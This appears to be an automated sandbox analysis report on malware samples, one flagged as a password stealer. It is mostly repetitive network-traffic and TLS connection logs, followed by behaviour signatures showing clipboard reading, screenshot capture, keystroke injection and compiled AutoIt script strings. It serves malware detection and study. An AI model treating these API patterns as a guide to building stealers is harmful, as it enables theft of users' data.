Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50211
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50214
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50328 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50221
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50220
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50583
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50223
Source: unknown	Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50225
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50239
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50230
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50232
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50597
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50596
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50598
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50245
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50530
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50205
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50328
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50329
Source: unknown	Network traffic detected: HTTP traffic on port 50245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50200
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50202
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50174
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50177
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50183
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50187
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50189
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50195
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50194
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50197
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50199
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50198
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50583 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50265
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50269
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50268
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50272
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50271
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50329 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50274
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50273
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50276
Source: unknown	Network traffic detected: HTTP traffic on port 50596 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50277
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50161
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50169
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50170
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50598 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50530 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50597 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 50229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 50169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.6:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.196.61.234:443 -> 192.168.2.6:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.196.61.234:443 -> 192.168.2.6:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.24.84:443 -> 192.168.2.6:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.24.84:443 -> 192.168.2.6:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.6:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.6:49947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.225.63.72:443 -> 192.168.2.6:50076 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50085 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50083 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50269 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50268 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50272 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50270 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50276 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50277 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

Code function: 16_2_0068EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

16_2_0068EAFF

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

Code function: 16_2_0068ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

16_2_0068ED6A

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

16_2_0068EAFF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040E460 GdiplusStartup,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdipDisposeImage,DeleteObject,ReleaseDC,GdiplusShutdown,

2_2_0040E460

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

Code function: 16_2_0067AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

16_2_0067AA57

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

Code function: 16_2_006A9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

16_2_006A9576

Source: Yara match

File source: Process Memory Space: explorhe.exe PID: 10012, type: MEMORYSTR

System Summary

.NET source code contains very large array initializations

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe, n4qP7aoGokPdoxNOxb.cs	Large array initialization: n4qP7aoGokPdoxNOxb: array initializer size 1509376
Source: autorun[1].exe.46.dr, TsITnRbciZYHZ37bQu.cs	Large array initialization: TsITnRbciZYHZ37bQu: array initializer size 307712
Source: autorun.exe.46.dr, TsITnRbciZYHZ37bQu.cs	Large array initialization: TsITnRbciZYHZ37bQu: array initializer size 307712

Binary is likely a compiled AutoIt script file

Source: 3kaNpKWTvXjwLZn_llOJ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000000.2300203640.00000000006D2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5c8fd6cc-7
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000000.2300203640.00000000006D2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4683f810-1
Source: 3kaNpKWTvXjwLZn_llOJ.exe.2.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_de2dd268-a
